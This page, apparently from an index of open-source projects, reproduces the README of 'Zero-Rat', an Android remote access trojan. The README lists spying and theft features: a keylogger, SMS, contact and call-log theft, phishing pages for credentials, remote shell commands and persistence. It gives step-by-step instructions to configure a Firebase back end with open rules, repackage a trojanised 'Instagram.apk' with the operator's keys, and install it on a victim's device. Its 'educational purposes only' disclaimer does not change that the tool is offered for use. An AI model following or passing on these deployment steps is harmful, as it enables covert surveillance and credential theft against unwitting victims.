An open API service indexing awesome lists of open source software.

https://github.com/caronero/zero-rat

Android RAT with GUI based Web Panel without port forwarding. you can use it from any device
https://github.com/caronero/zero-rat

android caro caro-nero caronero carotool gui-application hacker hacking-tool java rat tool tools toolzero zero zero-rat zerorat zerotool

Last synced: 3 months ago
JSON representation

Android RAT with GUI based Web Panel without port forwarding. you can use it from any device

Awesome Lists containing this project

README

        




Zero-Rat

#### A multifunctional Android RAT with GUI based Web Panel without port forwarding.
A tool that remasterd for AIRAVAT tool
## Features
- Read all the files of Internal Storage
- Download Any Media to your Device from Victims Device
- Get all the system information of Victim Device
- Retrieve the List of Installed Applications
- Retrive SMS
- Retrive Call Logs
- Retrive Contacts
- Send SMS
- Gets all the Notifications
- Keylogger
- Admin Permission
- Show Phishing Pages to steal credentials through notification.
- Steal credentials through pre built phishing pages
- Open any suspicious website through notification to steal credentials.
- Record Audio
- Play music in Victim's device
- Vibrate Device
- Text To Speech
- Change Wallpaper
- Run shell Commands
- Runs In Background
- Auto Starts on restarting the device
- Auto Starts when any notification arrives
- No port forwarding needed

## Requirements
- Firebase Account
- [ApkEasy Tool](https://apk-easy-tool.en.lo4d.com/windows) ( For PC ) or
[ApkTool M](https://maximoff.su/apktool/?lang=en) ( for Android)

## How to Build
### Firebase Setup
1. Create an Firebase Account and afterwords create a new project with any name.
1. Enable Firebase Database and Firebase Storage.
1. In Firebase Database Click on the rules and set `.read` and `.write` to `true`
- ```js
{
"rules": {
".read": "true",
".write": "true"
}
}
```
1. In Firebase Storage allow reads and writes for all paths.
- ```js
rules_version = '2';
service firebase.storage {
match /b/{bucket}/o {
match /{allPaths=**} {
allow read, write
}
}
}
```
1. Now Go to project overview and create an Android App and download the `google-services.json` file.
1. Also create a web app and copy the config of webapp.
### Panel Setup
1. You can use Github Pages or any Hosting Website for hosting the panel.
1. Open [home.html](./home.html) File and from [line number 16](https://github.com/Th30neAnd0nly/AIRAVAT/blob/302dca641bb04c6bed72d1b2cebdfc79ccfbb046/WEB%20PANEL/index.html#L16) replace the config with your web app config which you have created on Step 6.
1. Save the file , Your Panel Setup is completed.
### Android RAT
1. Download [Instagram.apk](https://github.com/caronero/Zero-Rat/raw/master/APK/Instagram.apk)
1. Decompile it using any Decompiler recommend above.
1. Now open `res/values/strings.xml` file.
1. Replace values of `firebase_database_url ` , `google_api_key` , `google_app_id` , `google_storage_bucket` , `project_id` with your Firebase Account using `google-services.json` file which you have downloaded on step 5
- Example
```xml
https://your_database_url.firebase.com
your_api_key
your_app_id
your_storage_bucket_url
project_id
```
1. Now compile the code with appt2.
1. Install the app in victim's device and give all the permissions after that the connection will show up in web panel.

## Contact Info
1. [Telegram](https://t.me/cn_zd)
2. [Watch full video installation here](https://t.me/cn_zd46/13)

## DISCLAIMER


TO BE USED FOR EDUCATIONAL PURPOSES ONLY

The use of the AIRAVAT is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Please read [LICENSE](LICENSE).